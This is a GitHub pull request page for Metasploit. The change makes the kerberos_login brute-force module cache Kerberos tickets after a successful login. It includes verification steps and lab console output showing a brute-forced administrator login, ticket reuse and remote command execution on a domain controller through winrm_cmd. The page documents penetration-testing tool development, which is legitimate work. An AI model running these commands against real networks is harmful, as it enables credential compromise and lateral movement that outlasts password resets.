Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Save Kerberos tickets in the MSF cache upon a successful login #18421

Merged
merged 1 commit into from
Oct 23, 2023
Merged

Save Kerberos tickets in the MSF cache upon a successful login #18421

merged 1 commit into from
Oct 23, 2023

Conversation

smashery
Copy link
Contributor

@smashery smashery commented Oct 3, 2023

When we receive a successful Kerberos login (in the kerberos_login brute force module), we have an opportunity to cache the ticket. This is particularly helpful when a brute force is detected by a defender, and a user changes a user's password, because the ticket may still be valid until it expires. It also reduces the amount of interaction required with the DC in future.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Clear the Kerberos cache: klist -d
  • use kerberos_login
  • Run a successful brute force against an account
  • Verify that the user's TGT is stored in the MSF kerberos cache (klist)
  • Run a module that uses the TGT (e.g. winrm_cmd). Ensure that the TGT is used (do not provide the user's password in the command, and verify that the log shows the cached ticket being used)
  • With the kerberos_login module, run the command against an account with pre-auth not-required
  • Verify that the ticket is not placed in the kerberos cache.

@cdelafuente-r7 cdelafuente-r7 self-assigned this Oct 19, 2023
@cdelafuente-r7
Copy link
Contributor

Thanks @smashery ! It looks good to me. I tested against Windows Server 2019 as a DC and follow the verification steps. I'll go ahead and land it.

Example output

  • Normal account
msf6 auxiliary(scanner/kerberos/kerberos_login) > run verbose=true rhosts=192.168.100.170 user_as_pass=true username=administrator domain=newlab.local password=123456

[*] Using domain: NEWLAB.LOCAL - 192.168.100.170:88   ...
[+] 192.168.100.170 - User found: "administrator" with password 123456. Hash: $krb5asrep$18$administrator@NEWLAB.LOCAL:<redacted>
[*] 192.168.100.170:88    - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231023145634_default_192.168.100.170_mit.kerberos.cca_100440.bin
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/kerberos/kerberos_login) > klist
Kerberos Cache
==============
id  host             principal                   sname                             issued                     status  path
--  ----             ---------                   -----                             ------                     ------  ----
44  192.168.100.170  administrator@NEWLAB.LOCAL  krbtgt/NEWLAB.LOCAL@NEWLAB.LOCAL  2023-10-23 14:56:34 +0200  active  /home/msfuser/.msf4/loot/20231023145634_default_192.168.100.170_mit.kerberos.cca_100440.bin

msf6 auxiliary(scanner/kerberos/kerberos_login) > use winrm_cmd

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/winrm/winrm_cmd                   normal  No     WinRM Command Runner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/winrm/winrm_cmd

[*] Using auxiliary/scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > run verbose=true rhosts=192.168.100.170 username=administrator winrm::auth=kerberos winrm::rhostname=newdc01 domaincontrollerrhost=192.168.100.170 domain=newlab.local

[*] 192.168.100.170:88 - Using cached credential for krbtgt/NEWLAB.LOCAL@NEWLAB.LOCAL administrator@NEWLAB.LOCAL
[+] 192.168.100.170:88 - Received a valid TGS-Response
[*] 192.168.100.170:5985  - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231023150009_default_192.168.100.170_mit.kerberos.cca_891331.bin
[+] 192.168.100.170:88 - Received a valid delegation TGS-Response
[+] 192.168.100.170:88 - Received AP-REQ. Extracting session key...

Windows IP Configuration

   Host Name . . . . . . . . . . . . : NEWDC01
   Primary Dns Suffix  . . . . . . . : newlab.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : newlab.local

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-C1-13-D0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::423f:2c49:56c:e1ba%14(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.100.170(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.2
   DHCPv6 IAID . . . . . . . . . . . : 100666409
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2B-10-07-80-00-0C-29-C1-13-D0
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
[+] Results saved to /home/msfuser/.msf4/loot/20231023150010_default_192.168.100.170_winrm.cmd_result_245281.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Account with pre-auth not-required
msf6 auxiliary(scanner/kerberos/kerberos_login) > klist
Kerberos Cache
==============
No tickets

msf6 auxiliary(scanner/kerberos/kerberos_login) > run verbose=true rhosts=192.168.100.170 user_as_pass=true username=smbtest domain=newlab.local password=123456

[*] Using domain: NEWLAB.LOCAL - 192.168.100.170:88   ...
[+] 192.168.100.170 - User: "smbtest" does not require preauthentication. Hash: $krb5asrep$23$smbtest@NEWLAB.LOCAL:<redacted>
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/kerberos/kerberos_login) > klist
Kerberos Cache
==============
No tickets

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Oct 23, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 77a8b0e into rapid7:master Oct 23, 2023
59 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
enhancement rn-enhancement release notes enhancement
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@smashery @cdelafuente-r7